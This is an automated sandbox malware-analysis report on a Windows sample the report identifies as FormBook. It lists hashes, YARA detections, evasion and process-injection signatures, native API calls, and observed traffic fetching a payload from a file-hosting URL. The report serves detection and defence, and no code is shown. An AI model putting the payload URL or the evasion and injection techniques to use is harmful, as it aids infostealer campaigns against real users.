Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1562756
MD5:0a089e934eb856c3e809d0fac53000c7
SHA1:661f86072031587be18ada0b6606ee82bb52038f
SHA256:f4e5ec593dcb18dca253d98f5133050e96f27f86c1e46b5882abf797fefe26b1
Tags:exeuser-Bitsight
Infos:

Detection

FormBook
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3148 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0A089E934EB856C3E809D0FAC53000C7)
    • file.exe (PID: 6672 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0A089E934EB856C3E809D0FAC53000C7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.3052844352.0000000006AA0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000002.00000002.2500380493.0000000000CD0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000000.00000002.3036442391.000000000282A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          Process Memory Space: file.exe PID: 3148JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.file.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.file.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                0.2.file.exe.6aa0000.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: file.exeReversingLabs: Detection: 21%
                  Yara detected FormBook
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2500380493.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: file.exeJoe Sandbox ML: detected
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.3043825245.0000000003781000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.00000000038B4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3053406005.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: file.exe, 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.3043825245.0000000003781000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.00000000038B4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3053406005.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmp
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 06CD7F2Ah0_2_06CD7EC0
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 06CD20F2h0_2_06CD1EE0
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 06CD20F2h0_2_06CD1EF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 06CD7F2Ah0_2_06CD7EB1
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 06CD9BD3h0_2_06CD94E0
                  Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 06CD7F2Ah0_2_06CD8065
                  Source: global trafficHTTP traffic detected: GET /ne8lox.mp4 HTTP/1.1Host: files.catbox.moeConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 108.181.20.35 108.181.20.35
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /ne8lox.mp4 HTTP/1.1Host: files.catbox.moeConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: files.catbox.moe
                  Source: file.exe, 00000000.00000002.3036442391.0000000002781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: file.exe, 00000000.00000002.3036442391.0000000002781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe
                  Source: file.exe, 00000000.00000002.3036442391.0000000002781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/ne8lox.mp4
                  Source: file.exeString found in binary or memory: https://files.catbox.moe/ne8lox.mp41OWRumaBvqxiIWy/UyUzNnQ==
                  Source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: file.exe, 00000000.00000002.3036442391.000000000282A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: file.exe, 00000000.00000002.3043825245.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3043825245.0000000003A1E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3052663874.00000000069D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.5:49704 version: TLS 1.2

                  E-Banking Fraud

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2500380493.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE7728 NtProtectVirtualMemory,0_2_06CE7728
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE9C90 NtResumeThread,0_2_06CE9C90
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE7720 NtProtectVirtualMemory,0_2_06CE7720
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE9C88 NtResumeThread,0_2_06CE9C88
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042C7A3 NtClose,2_2_0042C7A3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2B60 NtClose,LdrInitializeThunk,2_2_012E2B60
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_012E2DF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_012E2C70
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E35C0 NtCreateMutant,LdrInitializeThunk,2_2_012E35C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E4340 NtSetContextThread,2_2_012E4340
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E4650 NtSuspendThread,2_2_012E4650
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2BA0 NtEnumerateValueKey,2_2_012E2BA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2B80 NtQueryInformationFile,2_2_012E2B80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2BE0 NtQueryValueKey,2_2_012E2BE0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2BF0 NtAllocateVirtualMemory,2_2_012E2BF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2AB0 NtWaitForSingleObject,2_2_012E2AB0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2AF0 NtWriteFile,2_2_012E2AF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2AD0 NtReadFile,2_2_012E2AD0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2D30 NtUnmapViewOfSection,2_2_012E2D30
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2D00 NtSetInformationFile,2_2_012E2D00
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2D10 NtMapViewOfSection,2_2_012E2D10
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2DB0 NtEnumerateKey,2_2_012E2DB0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2DD0 NtDelayExecution,2_2_012E2DD0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2C00 NtQueryInformationProcess,2_2_012E2C00
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2C60 NtCreateKey,2_2_012E2C60
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2CA0 NtQueryInformationToken,2_2_012E2CA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2CF0 NtOpenProcess,2_2_012E2CF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2CC0 NtQueryVirtualMemory,2_2_012E2CC0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2F30 NtCreateSection,2_2_012E2F30
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2F60 NtCreateProcessEx,2_2_012E2F60
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2FA0 NtQuerySection,2_2_012E2FA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2FB0 NtResumeThread,2_2_012E2FB0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2F90 NtProtectVirtualMemory,2_2_012E2F90
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2FE0 NtCreateFile,2_2_012E2FE0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2E30 NtWriteVirtualMemory,2_2_012E2E30
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2EA0 NtAdjustPrivilegesToken,2_2_012E2EA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2E80 NtReadVirtualMemory,2_2_012E2E80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E2EE0 NtQueueApcThread,2_2_012E2EE0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E3010 NtOpenDirectoryObject,2_2_012E3010
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E3090 NtSetValueKey,2_2_012E3090
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E39B0 NtGetContextThread,2_2_012E39B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E3D10 NtOpenProcessToken,2_2_012E3D10
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E3D70 NtOpenThread,2_2_012E3D70
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DACFE40_2_00DACFE4
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069505D00_2_069505D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069505C00_2_069505C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069500060_2_06950006
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069500400_2_06950040
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069CA20E0_2_069CA20E
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C20900_2_069C2090
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069CE8800_2_069CE880
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C14B00_2_069C14B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C14A00_2_069C14A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C25990_2_069C2599
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C0D800_2_069C0D80
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C0D700_2_069C0D70
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069CFA780_2_069CFA78
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069CEBA70_2_069CEBA7
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069C20800_2_069C2080
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069CB1F00_2_069CB1F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_069CB1E00_2_069CB1E0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06A2666B0_2_06A2666B
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06A24CFA0_2_06A24CFA
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06A239E80_2_06A239E8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06A2A7A80_2_06A2A7A8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06A2A7B80_2_06A2A7B8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06A200070_2_06A20007
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06A200400_2_06A20040
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06A239D90_2_06A239D9
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B51EF00_2_06B51EF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06B5E8B80_2_06B5E8B8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CD3DB50_2_06CD3DB5
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CD7EC00_2_06CD7EC0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CD76B80_2_06CD76B8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CD7EB10_2_06CD7EB1
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CD80650_2_06CD8065
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CD61AA0_2_06CD61AA
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CD61B00_2_06CD61B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE42600_2_06CE4260
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE74800_2_06CE7480
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CEAA540_2_06CEAA54
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE42500_2_06CE4250
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CEA7410_2_06CEA741
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CEA7500_2_06CEA750
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CEAB1D0_2_06CEAB1D
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CE74700_2_06CE7470
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CEADA90_2_06CEADA9
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06CEADB80_2_06CEADB8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06E9E6C00_2_06E9E6C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06E9E2A00_2_06E9E2A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004028C02_2_004028C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004101332_2_00410133
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004031D02_2_004031D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00416A2E2_2_00416A2E
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00416A332_2_00416A33
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004103532_2_00410353
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040E3D32_2_0040E3D3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_004025302_2_00402530
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0042EDD32_2_0042EDD3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A01002_2_012A0100
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134A1182_2_0134A118
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013381582_2_01338158
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013641A22_2_013641A2
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013701AA2_2_013701AA
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013681CC2_2_013681CC
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013420002_2_01342000
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136A3522_2_0136A352
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013703E62_2_013703E6
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BE3F02_2_012BE3F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013502742_2_01350274
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013302C02_2_013302C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B05352_2_012B0535
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013705912_2_01370591
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013544202_2_01354420
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013624462_2_01362446
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0135E4F62_2_0135E4F6
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B07702_2_012B0770
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D47502_2_012D4750
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AC7C02_2_012AC7C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CC6E02_2_012CC6E0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C69622_2_012C6962
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B29A02_2_012B29A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0137A9A62_2_0137A9A6
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BA8402_2_012BA840
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B28402_2_012B2840
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012968B82_2_012968B8
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012DE8F02_2_012DE8F0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136AB402_2_0136AB40
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01366BD72_2_01366BD7
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AEA802_2_012AEA80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BAD002_2_012BAD00
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134CD1F2_2_0134CD1F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C8DBF2_2_012C8DBF
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012AADE02_2_012AADE0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0C002_2_012B0C00
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01350CB52_2_01350CB5
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A0CF22_2_012A0CF2
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01352F302_2_01352F30
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012F2F282_2_012F2F28
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012D0F302_2_012D0F30
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01324F402_2_01324F40
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0132EFA02_2_0132EFA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BCFE02_2_012BCFE0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A2FC82_2_012A2FC8
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136EE262_2_0136EE26
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B0E592_2_012B0E59
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136CE932_2_0136CE93
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012C2E902_2_012C2E90
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136EEDB2_2_0136EEDB
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012E516C2_2_012E516C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129F1722_2_0129F172
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0137B16B2_2_0137B16B
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012BB1B02_2_012BB1B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136F0E02_2_0136F0E0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013670E92_2_013670E9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B70C02_2_012B70C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0135F0CC2_2_0135F0CC
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136132D2_2_0136132D
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0129D34C2_2_0129D34C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012F739A2_2_012F739A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B52A02_2_012B52A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013512ED2_2_013512ED
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CB2C02_2_012CB2C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013675712_2_01367571
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134D5B02_2_0134D5B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013795C32_2_013795C3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136F43F2_2_0136F43F
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012A14602_2_012A1460
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136F7B02_2_0136F7B0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012F56302_2_012F5630
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013616CC2_2_013616CC
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_013459102_2_01345910
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B99502_2_012B9950
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CB9502_2_012CB950
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0131D8002_2_0131D800
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B38E02_2_012B38E0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136FB762_2_0136FB76
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CFB802_2_012CFB80
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01325BF02_2_01325BF0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012EDBF92_2_012EDBF9
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01323A6C2_2_01323A6C
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01367A462_2_01367A46
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136FA492_2_0136FA49
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012F5AA02_2_012F5AA0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01351AA32_2_01351AA3
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0134DAAC2_2_0134DAAC
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0135DAC62_2_0135DAC6
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01367D732_2_01367D73
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012B3D402_2_012B3D40
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01361D5A2_2_01361D5A
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_012CFDC02_2_012CFDC0
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_01329C322_2_01329C32
                  Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0136FCF22_2_0136FCF2
